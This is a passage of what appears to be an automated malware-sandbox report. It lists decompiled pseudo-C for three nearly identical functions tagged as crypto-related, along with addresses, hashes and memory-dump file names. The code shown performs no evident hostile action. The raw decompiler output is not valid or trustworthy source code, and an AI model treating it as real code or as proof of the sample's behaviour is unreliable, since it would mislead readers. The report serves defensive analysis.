                                                                                                                                                                                                                              • Opcode ID: d6ef73793ea1788ae08d57b95515db7d43b127d7364744ae73512ded182e4f5a
                                                                                                                                                                                                                              • Instruction ID: 63c19dc08e9aa5f12fcd117705e2ddd11662b7838b23ce3d8de87a324b06cecd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6ef73793ea1788ae08d57b95515db7d43b127d7364744ae73512ded182e4f5a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B4128D3C0964B14E9619AAB05407F4A6D0DF23FE8DD85BB8CD9D173D3DD0D658AD120
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C50750 Relevance: .1, Instructions: 138COMMONCrypto
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                                                                                              			E00007FF77FF735C50750(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				long long _v16;
				signed long long _v24;
				intOrPtr _t87;
				signed int _t91;
				void* _t111;
				intOrPtr _t112;
				signed int _t119;
				intOrPtr _t130;
				void* _t134;
				void* _t141;
				void* _t144;
				intOrPtr _t150;
				void* _t157;
				void* _t159;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t134 = __rcx;
				bpl = __edx;
				_t87 =  *((intOrPtr*)(__rcx + 0x34));
				_t111 = _t87 - 5;
				if (_t111 > 0) goto 0x35c50837;
				if (_t111 == 0) goto 0x35c507a0;
				_t112 = _t87;
				if (_t112 == 0) goto 0x35c5088b;
				if (_t112 == 0) goto 0x35c5080f;
				if (_t112 == 0) goto 0x35c507e8;
				if (_t112 == 0) goto 0x35c5088b;
				if (_t87 - 0xffffffffffffffff != 1) goto 0x35c50857;
				_t91 =  *(__rcx + 0x28);
				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t144;
				if ((_t91 >> 0x00000004 & 0x00000001) == 0) goto 0x35c507d2;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x35c507d2;
				 *(__rcx + 0x28) = _t91 | 0x00000040;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x35c508b6;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0x35c508cd;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x35c50809;
				goto 0x35c507bb;
				goto 0x35c507bb;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t119 = dil &  *(__rcx + 0x28) >> 0x00000004;
				if (_t119 == 0) goto 0x35c50831;
				goto 0x35c507bb;
				goto 0x35c507bb;
				if (_t119 == 0) goto 0x35c507a0;
				if (_t119 == 0) goto 0x35c507a0;
				if (_t119 == 0) goto 0x35c507a0;
				goto 0x35c5078e;
				_t130 =  *((intOrPtr*)(__rcx + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t130 + 0x30)) = 1;
				 *((intOrPtr*)(_t130 + 0x2c)) = 0x16;
				_v16 =  *((intOrPtr*)(__rcx + 8));
				_v24 = _v24 & 0x00000000;
				E00007FF77FF735C59330( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, _t141,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, _t157);
				goto 0x35c50926;
				 *((long long*)(_t134 + 0x18)) =  *((long long*)(_t134 + 0x18)) + 8;
				if (0 == 0) goto 0x35c508ae;
				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8));
				goto 0x35c507bb;
				goto 0x35c507bb;
				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xfffffff7;
				E00007FF77FF735C4F6A0(_t134, _t134 + 0x50,  *((intOrPtr*)(_t134 + 0x30)), _t150,  *((intOrPtr*)(_t134 + 8)));
				if (_t150 != 0) goto 0x35c508d6;
				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xffffffdf;
				 *((char*)(_t134 + 0x4c)) = 1;
				r8b = bpl;
				if (_t144 != 8) goto 0x35c508f0;
				E00007FF77FF735C51254(_t134, _t150);
				goto 0x35c508f7;
				E00007FF77FF735C50EBC( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8)), _t134, _t150, _t159);
				if (0 == 0) goto 0x35c50924;
				if ( *((intOrPtr*)(_t134 + 0x48)) == 0) goto 0x35c50915;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x40)))) == 0x30) goto 0x35c50924;
				 *((long long*)(_t134 + 0x40)) =  *((long long*)(_t134 + 0x40)) + 0xfffffffe;
				 *((short*)( *((intOrPtr*)(_t134 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t134 + 0x48)) =  *((intOrPtr*)(_t134 + 0x48)) + 1;
				return 1;
			}

















                                                                                                                                                                                                                              0x7ff735c50750
                                                                                                                                                                                                                              0x7ff735c50755
                                                                                                                                                                                                                              0x7ff735c5075a
                                                                                                                                                                                                                              0x7ff735c50764
                                                                                                                                                                                                                              0x7ff735c50767
                                                                                                                                                                                                                              0x7ff735c5076a
                                                                                                                                                                                                                              0x7ff735c5076d
                                                                                                                                                                                                                              0x7ff735c50770
                                                                                                                                                                                                                              0x7ff735c50776
                                                                                                                                                                                                                              0x7ff735c50778
                                                                                                                                                                                                                              0x7ff735c5077a
                                                                                                                                                                                                                              0x7ff735c50783
                                                                                                                                                                                                                              0x7ff735c5078c
                                                                                                                                                                                                                              0x7ff735c50791
                                                                                                                                                                                                                              0x7ff735c5079a
                                                                                                                                                                                                                              0x7ff735c507a0
                                                                                                                                                                                                                              0x7ff735c507a8
                                                                                                                                                                                                                              0x7ff735c507c2
                                                                                                                                                                                                                              0x7ff735c507c7
                                                                                                                                                                                                                              0x7ff735c507cf
                                                                                                                                                                                                                              0x7ff735c507d6
                                                                                                                                                                                                                              0x7ff735c507dc
                                                                                                                                                                                                                              0x7ff735c507e3
                                                                                                                                                                                                                              0x7ff735c507f0
                                                                                                                                                                                                                              0x7ff735c50800
                                                                                                                                                                                                                              0x7ff735c50807
                                                                                                                                                                                                                              0x7ff735c5080d
                                                                                                                                                                                                                              0x7ff735c50817
                                                                                                                                                                                                                              0x7ff735c50821
                                                                                                                                                                                                                              0x7ff735c50828
                                                                                                                                                                                                                              0x7ff735c5082f
                                                                                                                                                                                                                              0x7ff735c50835
                                                                                                                                                                                                                              0x7ff735c5083a
                                                                                                                                                                                                                              0x7ff735c50843
                                                                                                                                                                                                                              0x7ff735c5084c
                                                                                                                                                                                                                              0x7ff735c50852
                                                                                                                                                                                                                              0x7ff735c50857
                                                                                                                                                                                                                              0x7ff735c5085b
                                                                                                                                                                                                                              0x7ff735c5085e
                                                                                                                                                                                                                              0x7ff735c50865
                                                                                                                                                                                                                              0x7ff735c50869
                                                                                                                                                                                                                              0x7ff735c50874
                                                                                                                                                                                                                              0x7ff735c50879
                                                                                                                                                                                                                              0x7ff735c5087f
                                                                                                                                                                                                                              0x7ff735c50886
                                                                                                                                                                                                                              0x7ff735c50893
                                                                                                                                                                                                                              0x7ff735c508a3
                                                                                                                                                                                                                              0x7ff735c508a5
                                                                                                                                                                                                                              0x7ff735c508a9
                                                                                                                                                                                                                              0x7ff735c508b1
                                                                                                                                                                                                                              0x7ff735c508c1
                                                                                                                                                                                                                              0x7ff735c508c8
                                                                                                                                                                                                                              0x7ff735c508d0
                                                                                                                                                                                                                              0x7ff735c508d2
                                                                                                                                                                                                                              0x7ff735c508d6
                                                                                                                                                                                                                              0x7ff735c508da
                                                                                                                                                                                                                              0x7ff735c508e4
                                                                                                                                                                                                                              0x7ff735c508e9
                                                                                                                                                                                                                              0x7ff735c508ee
                                                                                                                                                                                                                              0x7ff735c508f2
                                                                                                                                                                                                                              0x7ff735c508ff
                                                                                                                                                                                                                              0x7ff735c5090a
                                                                                                                                                                                                                              0x7ff735c50913
                                                                                                                                                                                                                              0x7ff735c50915
                                                                                                                                                                                                                              0x7ff735c5091e
                                                                                                                                                                                                                              0x7ff735c50921
                                                                                                                                                                                                                              0x7ff735c5093a

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: e314ab4061b8a78247cd23a36e9798261aa8bfd652ab958e9c882b31c3b3d54e
                                                                                                                                                                                                                              • Instruction ID: b03428e2b56957b357d637967cc3e3613ec5a8c56fceb143c388a27d9a66912f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e314ab4061b8a78247cd23a36e9798261aa8bfd652ab958e9c882b31c3b3d54e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB51D3B7A0861392E7289E6AC05463CA7B0EB40F6CF944534CF4DA77D8DB28EC41D790
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C5037C Relevance: .1, Instructions: 138COMMONCrypto
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 73%
                                                                                                                                                                                                                              			E00007FF77FF735C5037C(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				long long _v16;
				signed long long _v24;
				intOrPtr _t87;
				signed int _t91;
				void* _t111;
				intOrPtr _t112;
				signed int _t119;
				intOrPtr _t130;
				void* _t134;
				void* _t141;
				void* _t144;
				intOrPtr _t150;
				void* _t157;
				void* _t159;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t134 = __rcx;
				bpl = __edx;
				_t87 =  *((intOrPtr*)(__rcx + 0x34));
				_t111 = _t87 - 5;
				if (_t111 > 0) goto 0x35c50463;
				if (_t111 == 0) goto 0x35c503cc;
				_t112 = _t87;
				if (_t112 == 0) goto 0x35c504b7;
				if (_t112 == 0) goto 0x35c5043b;
				if (_t112 == 0) goto 0x35c50414;
				if (_t112 == 0) goto 0x35c504b7;
				if (_t87 - 0xffffffffffffffff != 1) goto 0x35c50483;
				_t91 =  *(__rcx + 0x28);
				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t144;
				if ((_t91 >> 0x00000004 & 0x00000001) == 0) goto 0x35c503fe;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x35c503fe;
				 *(__rcx + 0x28) = _t91 | 0x00000040;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x35c504e2;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0x35c504f9;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x35c50435;
				goto 0x35c503e7;
				goto 0x35c503e7;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t119 = dil &  *(__rcx + 0x28) >> 0x00000004;
				if (_t119 == 0) goto 0x35c5045d;
				goto 0x35c503e7;
				goto 0x35c503e7;
				if (_t119 == 0) goto 0x35c503cc;
				if (_t119 == 0) goto 0x35c503cc;
				if (_t119 == 0) goto 0x35c503cc;
				goto 0x35c503ba;
				_t130 =  *((intOrPtr*)(__rcx + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t130 + 0x30)) = 1;
				 *((intOrPtr*)(_t130 + 0x2c)) = 0x16;
				_v16 =  *((intOrPtr*)(__rcx + 8));
				_v24 = _v24 & 0x00000000;
				E00007FF77FF735C59330( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, _t141,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, _t157);
				goto 0x35c50552;
				 *((long long*)(_t134 + 0x18)) =  *((long long*)(_t134 + 0x18)) + 8;
				if (0 == 0) goto 0x35c504da;
				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8));
				goto 0x35c503e7;
				goto 0x35c503e7;
				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xfffffff7;
				E00007FF77FF735C4F6A0(_t134, _t134 + 0x50,  *((intOrPtr*)(_t134 + 0x30)), _t150,  *((intOrPtr*)(_t134 + 8)));
				if (_t150 != 0) goto 0x35c50502;
				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xffffffdf;
				 *((char*)(_t134 + 0x4c)) = 1;
				r8b = bpl;
				if (_t144 != 8) goto 0x35c5051c;
				E00007FF77FF735C51120(0, _t134, _t150, _t159);
				goto 0x35c50523;
				E00007FF77FF735C50D8C( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8)), _t134, _t159);
				if (0 == 0) goto 0x35c50550;
				if ( *((intOrPtr*)(_t134 + 0x48)) == 0) goto 0x35c50541;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x40)))) == 0x30) goto 0x35c50550;
				 *((long long*)(_t134 + 0x40)) =  *((long long*)(_t134 + 0x40)) + 0xfffffffe;
				 *((short*)( *((intOrPtr*)(_t134 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t134 + 0x48)) =  *((intOrPtr*)(_t134 + 0x48)) + 1;
				return 1;
			}

















                                                                                                                                                                                                                              0x7ff735c5037c
                                                                                                                                                                                                                              0x7ff735c50381
                                                                                                                                                                                                                              0x7ff735c50386
                                                                                                                                                                                                                              0x7ff735c50390
                                                                                                                                                                                                                              0x7ff735c50393
                                                                                                                                                                                                                              0x7ff735c50396
                                                                                                                                                                                                                              0x7ff735c50399
                                                                                                                                                                                                                              0x7ff735c5039c
                                                                                                                                                                                                                              0x7ff735c503a2
                                                                                                                                                                                                                              0x7ff735c503a4
                                                                                                                                                                                                                              0x7ff735c503a6
                                                                                                                                                                                                                              0x7ff735c503af
                                                                                                                                                                                                                              0x7ff735c503b8
                                                                                                                                                                                                                              0x7ff735c503bd
                                                                                                                                                                                                                              0x7ff735c503c6
                                                                                                                                                                                                                              0x7ff735c503cc
                                                                                                                                                                                                                              0x7ff735c503d4
                                                                                                                                                                                                                              0x7ff735c503ee
                                                                                                                                                                                                                              0x7ff735c503f3
                                                                                                                                                                                                                              0x7ff735c503fb
                                                                                                                                                                                                                              0x7ff735c50402
                                                                                                                                                                                                                              0x7ff735c50408
                                                                                                                                                                                                                              0x7ff735c5040f
                                                                                                                                                                                                                              0x7ff735c5041c
                                                                                                                                                                                                                              0x7ff735c5042c
                                                                                                                                                                                                                              0x7ff735c50433
                                                                                                                                                                                                                              0x7ff735c50439
                                                                                                                                                                                                                              0x7ff735c50443
                                                                                                                                                                                                                              0x7ff735c5044d
                                                                                                                                                                                                                              0x7ff735c50454
                                                                                                                                                                                                                              0x7ff735c5045b
                                                                                                                                                                                                                              0x7ff735c50461
                                                                                                                                                                                                                              0x7ff735c50466
                                                                                                                                                                                                                              0x7ff735c5046f
                                                                                                                                                                                                                              0x7ff735c50478
                                                                                                                                                                                                                              0x7ff735c5047e
                                                                                                                                                                                                                              0x7ff735c50483
                                                                                                                                                                                                                              0x7ff735c50487
                                                                                                                                                                                                                              0x7ff735c5048a
                                                                                                                                                                                                                              0x7ff735c50491
                                                                                                                                                                                                                              0x7ff735c50495
                                                                                                                                                                                                                              0x7ff735c504a0
                                                                                                                                                                                                                              0x7ff735c504a5
                                                                                                                                                                                                                              0x7ff735c504ab
                                                                                                                                                                                                                              0x7ff735c504b2
                                                                                                                                                                                                                              0x7ff735c504bf
                                                                                                                                                                                                                              0x7ff735c504cf
                                                                                                                                                                                                                              0x7ff735c504d1
                                                                                                                                                                                                                              0x7ff735c504d5
                                                                                                                                                                                                                              0x7ff735c504dd
                                                                                                                                                                                                                              0x7ff735c504ed
                                                                                                                                                                                                                              0x7ff735c504f4
                                                                                                                                                                                                                              0x7ff735c504fc
                                                                                                                                                                                                                              0x7ff735c504fe
                                                                                                                                                                                                                              0x7ff735c50502
                                                                                                                                                                                                                              0x7ff735c50506
                                                                                                                                                                                                                              0x7ff735c50510
                                                                                                                                                                                                                              0x7ff735c50515
                                                                                                                                                                                                                              0x7ff735c5051a
                                                                                                                                                                                                                              0x7ff735c5051e
                                                                                                                                                                                                                              0x7ff735c5052b
                                                                                                                                                                                                                              0x7ff735c50536
                                                                                                                                                                                                                              0x7ff735c5053f
                                                                                                                                                                                                                              0x7ff735c50541
                                                                                                                                                                                                                              0x7ff735c5054a
                                                                                                                                                                                                                              0x7ff735c5054d
                                                                                                                                                                                                                              0x7ff735c50566

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: a788d6f395ac3acaf7b79a53bb3f3be841dca5a16f763faf8f3805c7db72d5d9
                                                                                                                                                                                                                              • Instruction ID: 2df6eb5cb7fb550338210cf4a1ad06d378cd334d9eb87177cfbbc866bdb87445
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a788d6f395ac3acaf7b79a53bb3f3be841dca5a16f763faf8f3805c7db72d5d9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7251C1B3A0865393E7299E6AC15433CA760EB54F1CF941634DF4AA77D9CB28EC41D390
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C50B24 Relevance: .1, Instructions: 138COMMONCrypto
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 71%
                                                                                                                                                                                                                              			E00007FF77FF735C50B24(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				long long _v16;
				signed long long _v24;
				intOrPtr _t87;
				signed int _t91;
				void* _t111;
				intOrPtr _t112;
				signed int _t119;
				intOrPtr _t130;
				void* _t134;
				void* _t141;
				void* _t144;
				intOrPtr _t150;
				void* _t157;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t134 = __rcx;
				bpl = __edx;
				_t87 =  *((intOrPtr*)(__rcx + 0x34));
				_t111 = _t87 - 5;
				if (_t111 > 0) goto 0x35c50c0b;
				if (_t111 == 0) goto 0x35c50b74;
				_t112 = _t87;
				if (_t112 == 0) goto 0x35c50c5f;
				if (_t112 == 0) goto 0x35c50be3;
				if (_t112 == 0) goto 0x35c50bbc;
				if (_t112 == 0) goto 0x35c50c5f;
				if (_t87 - 0xffffffffffffffff != 1) goto 0x35c50c2b;
				_t91 =  *(__rcx + 0x28);
				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t144;
				if ((_t91 >> 0x00000004 & 0x00000001) == 0) goto 0x35c50ba6;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x35c50ba6;
				 *(__rcx + 0x28) = _t91 | 0x00000040;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x35c50c8a;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0x35c50ca1;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x35c50bdd;
				goto 0x35c50b8f;
				goto 0x35c50b8f;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t119 = dil &  *(__rcx + 0x28) >> 0x00000004;
				if (_t119 == 0) goto 0x35c50c05;
				goto 0x35c50b8f;
				goto 0x35c50b8f;
				if (_t119 == 0) goto 0x35c50b74;
				if (_t119 == 0) goto 0x35c50b74;
				if (_t119 == 0) goto 0x35c50b74;
				goto 0x35c50b62;
				_t130 =  *((intOrPtr*)(__rcx + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t130 + 0x30)) = 1;
				 *((intOrPtr*)(_t130 + 0x2c)) = 0x16;
				_v16 =  *((intOrPtr*)(__rcx + 8));
				_v24 = _v24 & 0x00000000;
				E00007FF77FF735C59330( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, _t141,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, _t157);
				goto 0x35c50cfa;
				 *((long long*)(_t134 + 0x18)) =  *((long long*)(_t134 + 0x18)) + 8;
				if (0 == 0) goto 0x35c50c82;
				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8));
				goto 0x35c50b8f;
				goto 0x35c50b8f;
				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xfffffff7;
				E00007FF77FF735C4F6A0(_t134, _t134 + 0x50,  *((intOrPtr*)(_t134 + 0x30)), _t150,  *((intOrPtr*)(_t134 + 8)));
				if (_t150 != 0) goto 0x35c50caa;
				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xffffffdf;
				 *((char*)(_t134 + 0x4c)) = 1;
				r8b = bpl;
				if (_t144 != 8) goto 0x35c50cc4;
				E00007FF77FF735C513A0(0, _t134, _t150);
				goto 0x35c50ccb;
				E00007FF77FF735C51000( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8)), _t134);
				if (0 == 0) goto 0x35c50cf8;
				if ( *((intOrPtr*)(_t134 + 0x48)) == 0) goto 0x35c50ce9;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x40)))) == 0x30) goto 0x35c50cf8;
				 *((long long*)(_t134 + 0x40)) =  *((long long*)(_t134 + 0x40)) + 0xfffffffe;
				 *((short*)( *((intOrPtr*)(_t134 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t134 + 0x48)) =  *((intOrPtr*)(_t134 + 0x48)) + 1;
				return 1;
			}
















                                                                                                                                                                                                                              0x7ff735c50b24
                                                                                                                                                                                                                              0x7ff735c50b29
                                                                                                                                                                                                                              0x7ff735c50b2e
                                                                                                                                                                                                                              0x7ff735c50b38
                                                                                                                                                                                                                              0x7ff735c50b3b
                                                                                                                                                                                                                              0x7ff735c50b3e
                                                                                                                                                                                                                              0x7ff735c50b41
                                                                                                                                                                                                                              0x7ff735c50b44
                                                                                                                                                                                                                              0x7ff735c50b4a
                                                                                                                                                                                                                              0x7ff735c50b4c
                                                                                                                                                                                                                              0x7ff735c50b4e
                                                                                                                                                                                                                              0x7ff735c50b57
                                                                                                                                                                                                                              0x7ff735c50b60
                                                                                                                                                                                                                              0x7ff735c50b65
                                                                                                                                                                                                                              0x7ff735c50b6e
                                                                                                                                                                                                                              0x7ff735c50b74
                                                                                                                                                                                                                              0x7ff735c50b7c
                                                                                                                                                                                                                              0x7ff735c50b96
                                                                                                                                                                                                                              0x7ff735c50b9b
                                                                                                                                                                                                                              0x7ff735c50ba3
                                                                                                                                                                                                                              0x7ff735c50baa
                                                                                                                                                                                                                              0x7ff735c50bb0
                                                                                                                                                                                                                              0x7ff735c50bb7
                                                                                                                                                                                                                              0x7ff735c50bc4
                                                                                                                                                                                                                              0x7ff735c50bd4
                                                                                                                                                                                                                              0x7ff735c50bdb
                                                                                                                                                                                                                              0x7ff735c50be1
                                                                                                                                                                                                                              0x7ff735c50beb
                                                                                                                                                                                                                              0x7ff735c50bf5
                                                                                                                                                                                                                              0x7ff735c50bfc
                                                                                                                                                                                                                              0x7ff735c50c03
                                                                                                                                                                                                                              0x7ff735c50c09
                                                                                                                                                                                                                              0x7ff735c50c0e
                                                                                                                                                                                                                              0x7ff735c50c17
                                                                                                                                                                                                                              0x7ff735c50c20
                                                                                                                                                                                                                              0x7ff735c50c26
                                                                                                                                                                                                                              0x7ff735c50c2b
                                                                                                                                                                                                                              0x7ff735c50c2f
                                                                                                                                                                                                                              0x7ff735c50c32
                                                                                                                                                                                                                              0x7ff735c50c39
                                                                                                                                                                                                                              0x7ff735c50c3d
                                                                                                                                                                                                                              0x7ff735c50c48
                                                                                                                                                                                                                              0x7ff735c50c4d
                                                                                                                                                                                                                              0x7ff735c50c53
                                                                                                                                                                                                                              0x7ff735c50c5a
                                                                                                                                                                                                                              0x7ff735c50c67
                                                                                                                                                                                                                              0x7ff735c50c77
                                                                                                                                                                                                                              0x7ff735c50c79
                                                                                                                                                                                                                              0x7ff735c50c7d
                                                                                                                                                                                                                              0x7ff735c50c85
                                                                                                                                                                                                                              0x7ff735c50c95
                                                                                                                                                                                                                              0x7ff735c50c9c
                                                                                                                                                                                                                              0x7ff735c50ca4
                                                                                                                                                                                                                              0x7ff735c50ca6
                                                                                                                                                                                                                              0x7ff735c50caa
                                                                                                                                                                                                                              0x7ff735c50cae
                                                                                                                                                                                                                              0x7ff735c50cb8
                                                                                                                                                                                                                              0x7ff735c50cbd
                                                                                                                                                                                                                              0x7ff735c50cc2
                                                                                                                                                                                                                              0x7ff735c50cc6
                                                                                                                                                                                                                              0x7ff735c50cd3
                                                                                                                                                                                                                              0x7ff735c50cde
                                                                                                                                                                                                                              0x7ff735c50ce7
                                                                                                                                                                                                                              0x7ff735c50ce9
                                                                                                                                                                                                                              0x7ff735c50cf2
                                                                                                                                                                                                                              0x7ff735c50cf5
                                                                                                                                                                                                                              0x7ff735c50d0e

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 78a19bdf7782d80acaab02229a03e2db7c52df3d684b2984aac2f5a6f25cfe1a
                                                                                                                                                                                                                              • Instruction ID: f1ebfece4bb93d2f79655f28c79fae5536690d2ec0c961d8c7d449a90cc5efd4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 78a19bdf7782d80acaab02229a03e2db7c52df3d684b2984aac2f5a6f25cfe1a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8151B6B3A0861392E728AF6AC05523CA7A0EB51F6CF540635CF49A77D9CF29EC41D790
                                                                                                                                                                                                                              Uniqueness

